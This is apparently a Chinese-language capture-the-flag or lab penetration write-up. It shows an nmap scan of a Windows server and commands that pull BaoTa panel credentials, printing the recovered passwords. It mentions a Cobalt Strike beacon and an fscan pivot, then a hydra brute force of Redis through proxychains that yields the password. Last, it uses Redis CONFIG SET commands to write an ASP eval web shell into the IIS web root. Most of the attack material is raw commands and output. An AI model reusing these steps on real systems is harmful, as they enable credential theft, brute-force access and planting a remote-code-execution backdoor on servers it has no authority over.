sudo nmap -sT -sV -O 192.168.0.206 -p- Starting Nmap 7.93 ( https://nmap.org ) Nmap scan report for www.cocat.cc (192.168.0.206) Host is up (0.0025s latency). Not shown: 65529 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 21/tcp open ftp FileZilla ftpd 80/tcp open http Apache httpd 2.4.46 ((Win32) OpenSSL/1.1.1g mod_fcgid/2.3.9a) 888/tcp open http Apache httpd 2.4.46 ((Win32) OpenSSL/1.1.1g mod_fcgid/2.3.9a) 3306/tcp open mysql MySQL (unauthorized) 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 8888/tcp open http Ajenti http control panel MAC Address: 00:0C:29:DF:81:FA (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Microsoft Windows 2012 OS CPE: cpe:/o:microsoft:windows_server_2012:r2 OS details: Microsoft Windows Server 2012 or Windows Server 2012 R2 Network Distance: 1 hop Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 172.78 seconds
set /p port=<%panel_path%\data\port.pl #8888 set /p password=<%panel_path%\data\default.pl #jSKyFFdj set /p admin_path=<%panel_path%\data\admin_path.pl #/e1VOsmtO `C:/BtSoft/panel/data/default.db` #gOXZQjWA
用户名在数据库中:C:/BtSoft/panel/data/default.db。
上传CS马执行:
Flag1
C:\Users\Administrator\root.txt
Redis服务器
信息收集
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
beacon> shell fscan -h 10.10.11.133 [*] Tasked beacon to run: fscan -h 10.10.11.133 [+] host called home, sent: 52 bytes [+] received output:
sudo proxychains hydra redis://10.10.11.133 -P somd5top10w.txt [sudo] password for kali: [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.16 Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-18 04:20:16 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 16 tasks per 1 server, overall 16 tasks, 100000 login tries (l:1/p:100000), ~6250 tries per task [DATA] attacking redis://10.10.11.133:6379/ [proxychains] Strict chain ... 192.168.0.12:24791 ... 10.10.11.133:6379 ... OK [proxychains] Strict chain ... 192.168.0.12:24791 [proxychains] Strict chain ... 192.168.0.12:24791 [proxychains] Strict chain ... 192.168.0.12:24791 [proxychains] Strict chain ... 192.168.0.12:24791 [proxychains] Strict chain ... 192.168.0.12:24791 [proxychains] Strict chain ... 192.168.0.12:24791 [6379][redis] host: 10.10.11.133 password: 123456789qq [STATUS] attack finished for 10.10.11.133 (valid pair found) 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished
写入默认IIS网站路径:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
proxychains redis-cli -h 10.10.11.133 [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.16 [proxychains] Strict chain ... 192.168.0.12:24791 ... 10.10.11.133:6379 ... OK 10.10.11.133:6379> auth 123456789qq OK 10.10.11.133:6379> CONFIG SET dir C:\inetpub\wwwroot OK 10.10.11.133:6379> CONFIG SET dbfilename a.asp OK 10.10.11.133:6379> set x ' <%eval request("abc")%> ' OK 10.10.11.133:6379> save OK